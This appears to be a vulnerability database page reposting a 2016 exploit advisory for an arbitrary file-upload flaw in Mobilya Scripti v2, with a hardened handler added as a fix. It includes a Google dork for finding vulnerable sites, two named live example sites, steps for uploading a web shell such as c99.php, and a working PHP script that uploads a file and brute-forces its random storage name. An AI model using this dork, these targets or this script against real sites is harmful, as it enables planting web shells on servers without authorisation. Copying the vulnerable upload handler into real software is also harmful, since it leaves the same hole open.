
Mobilya Scripti 2 Shell Upload

Reported: 11 Apr 2016, by Antidote
Type: packetstorm
Source: packetstormsecurity.com

Mobilya Scripti v2 Shell Upload vulnerability on insan_kaynaklari_gonder.ph

Code
`
# Exploit Title: Mobilya Scripti v2 File Upload
# Google Dork: intext:Lütfen sadece .doc yada .pdf uzantılı dosya gönderin.
#   (the dork is the upload form's own hint text: "Please send only files with a .doc or .pdf extension")
# Date: 10.4.2016
# Exploit Author: Antidote([email protected])
# Vendor Homepage: http://www.hazirscriptler.web.tr/mobilya-scripti-php-v2
# Version: v2
# Tested on: Windows
------------------------------------------------
# [ASCII-art "antidote" banner]
------------------------------------------------
Script Bug File: insan_kaynaklari_gonder.php
------------------------------------------------
// Excerpt of the vulnerable handler. p() is the script's own request helper
// (not shown); the variable names are Turkish: eposta = e-mail, tarih = date,
// kaynak = source (temp file), dosya = file, uzanti = extension,
// yeni_isim = new name, hedef = destination.
$eposta = p('txt_email');
$tarih = date("d-m-Y");
$kaynak = $_FILES["txt_dosya"]["tmp_name"];
$dosya = $_FILES["txt_dosya"]["name"];            // client-supplied name, used as-is below
$uzanti = explode(".", $_FILES[txt_dosya][name]); // extension is split out but never checked
$random = rand(0,9999);                           // only 10000 possible prefixes
$yeni_isim = $random."_".$dosya;
$hedef = "kit/cv/".$yeni_isim;                    // written inside the web root

if($dosya=="")
{
echo 'Lutfen cv yükleyiniz....';                  // "Please upload a CV"
echo '<meta http-equiv="refresh" content="2; url=sayfa-insan-kaynaklari" />';
}

else{
$gitti=move_uploaded_file($kaynak,$hedef);        // any content, any extension
$iletisim_ekle_sorgu=mysql_query("insert into insan_kaynaklari (eposta, dosya, tarih) values ('$eposta', '$yeni_isim', '$tarih')");
echo 'Başvurunuz başarıyla alınmıştır. Değerlendirilip dönüş yapılacaktır.. Yonlendiriliyorsunuz...';
// "Your application has been received successfully. It will be evaluated and you will be contacted. Redirecting..."
echo '<meta http-equiv="refresh" content="2; url=sayfa-insan-kaynaklari" />';
}
}   // closes an enclosing block that is outside this excerpt

---------------------------------------------------------------------------------
Example: http://nehircollection.com/sayfa-insan-kaynaklari , http://www.saralphotography.com/sayfa-insan-kaynaklari
Enter an e-mail address, attach the shell as the CV file and submit. The file is
saved as kit/cv/<rand(0,9999)>_<your file name>, so the uploaded shell can be
reached once that prefix is known.
Or run the author's PHP helper locally: https://gist.github.com/anonymous/a30506e46d6edc724bb373744d25cd8c
  Url: http://example.com
  Shellname: name of the shell file to send (Ex: c99.php, a.php, c.php)
  Submit
  Wait till the end
  then open the uploaded shell's URL :)

---------------------------------------------------------------------------------
Team : Janissaries.org, Spycod3.org
Thanks : Bydokunulmaz
Twitter: @coderantidote
Website: antidotesoft.com
`
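A command-line version of the procedure above, added here as an example; it is not the advisory's gist (whose contents are not on this page). It uses only what the excerpt shows: the form posts `txt_email` plus a `txt_dosya` file, the handler stores the file as `kit/cv/<rand(0,9999)>_<name>` under the web root, and prints the Turkish success message. The handler's URL (`insan_kaynaklari_gonder.php` under the site root) and the HEAD-based probing are assumptions to verify against the actual install; use it only against systems you are authorised to test.

```php
<?php
// Added example, not the advisory's own gist. Assumes the form field names and
// the kit/cv/<rand>_<name> destination visible in the vulnerable excerpt; the
// handler path below is assumed and may differ on a rewritten site.
// Usage: php poc.php http://target.example ./test.txt

if ($argc < 3) {
    fwrite(STDERR, "usage: php poc.php <base-url> <file-to-upload>\n");
    exit(1);
}
$base = rtrim($argv[1], '/');
$file = $argv[2];
$name = basename($file);

// 1. Upload with the same field names the excerpt reads from $_FILES / p().
$ch = curl_init("$base/insan_kaynaklari_gonder.php");   // assumed handler path
curl_setopt_array($ch, [
    CURLOPT_POST           => true,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POSTFIELDS     => [
        'txt_email' => 'test@example.com',
        'txt_dosya' => new CURLFile($file, 'application/octet-stream', $name),
    ],
]);
$resp = curl_exec($ch);
curl_close($ch);
if ($resp === false || strpos($resp, 'Başvurunuz başarıyla') === false) {
    fwrite(STDERR, "upload did not return the success message; check the handler path\n");
    exit(1);
}

// 2. Recover the stored name: rand(0,9999) leaves at most 10000 candidates
//    under kit/cv/, and a HEAD request per candidate tells which one exists.
for ($n = 0; $n <= 9999; $n++) {
    $url = "$base/kit/cv/{$n}_" . rawurlencode($name);
    $ch = curl_init($url);
    curl_setopt_array($ch, [CURLOPT_NOBODY => true, CURLOPT_RETURNTRANSFER => true]);
    curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if ($code === 200) {
        echo "uploaded file is at $url\n";
        exit(0);
    }
}
fwrite(STDERR, "no candidate answered 200; the prefix, directory or name may differ\n");
exit(2);
```

If the server rejects HEAD, switch the probe to a GET and compare status codes; the 10000-request loop is the whole "wait till the end" step.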
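For the fix side, the same handler rewritten to close the three weaknesses the excerpt shows: the extension is computed but never checked, the stored name is attacker-controlled with only 10000 possible prefixes, and the file is written under the web root. This is an added example, not the vendor's patch (none is on this page). It assumes PHP 7 or later, that `p()` is the script's existing request helper, that `$db` is a mysqli connection, and that `/var/www/private/cv` stands in for some directory outside the document root.

```php
<?php
// Added example: hardened replacement for the upload handler in the excerpt.
// Assumes $db is a mysqli connection and p() the script's request helper.
$eposta = p('txt_email');
$tarih  = date("d-m-Y");

// Store outside the document root so an uploaded file can never be requested
// as a script, whatever its name. Assumed path; adjust per install.
$store = '/var/www/private/cv';

if (!isset($_FILES['txt_dosya']) || $_FILES['txt_dosya']['error'] !== UPLOAD_ERR_OK) {
    exit('Lütfen CV yükleyiniz.');                          // "Please upload a CV"
}
$kaynak = $_FILES['txt_dosya']['tmp_name'];
$dosya  = $_FILES['txt_dosya']['name'];

// 1. Allow-list the extension the form promises. Take only the last one,
//    lower-cased, so "shell.pdf.php" and "shell.PHP" are both rejected.
$uzanti = strtolower(pathinfo($dosya, PATHINFO_EXTENSION));
$izinli = ['doc' => 'application/msword', 'pdf' => 'application/pdf'];
if (!isset($izinli[$uzanti])) {
    exit('Lütfen sadece .doc yada .pdf uzantılı dosya gönderin.');
}

// 2. Check the content, not just the name: a PHP file renamed to .pdf fails
//    here. The exact MIME strings come from the system magic database.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($kaynak);
if ($mime !== $izinli[$uzanti]) {
    exit('Dosya içeriği uzantıyla uyuşmuyor.');              // "Content does not match extension"
}

// 3. Server-generated name: 128 random bits instead of rand(0,9999)."_".$dosya,
//    and the client-supplied name never reaches the filesystem.
$yeni_isim = bin2hex(random_bytes(16)) . '.' . $uzanti;
$hedef = $store . '/' . $yeni_isim;
if (!move_uploaded_file($kaynak, $hedef)) {
    exit('Yükleme başarısız.');                               // "Upload failed"
}

// 4. Prepared statement instead of a string-built mysql_query(). p() is not
//    shown in the excerpt, so whether $eposta is escaped is unknown; binding
//    the values removes the question.
$stmt = $db->prepare("INSERT INTO insan_kaynaklari (eposta, dosya, tarih) VALUES (?, ?, ?)");
$stmt->bind_param('sss', $eposta, $yeni_isim, $tarih);
$stmt->execute();
$stmt->close();

echo 'Başvurunuz başarıyla alınmıştır. Yönlendiriliyorsunuz...';  // "Application received. Redirecting..."
echo '<meta http-equiv="refresh" content="2; url=sayfa-insan-kaynaklari" />';
```

Whoever needs to read the CVs later should fetch them through a download script that streams from `$store` with a fixed `Content-Type`, never by a direct URL into the upload directory.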

Vulners AI Score: 7.4 (high risk)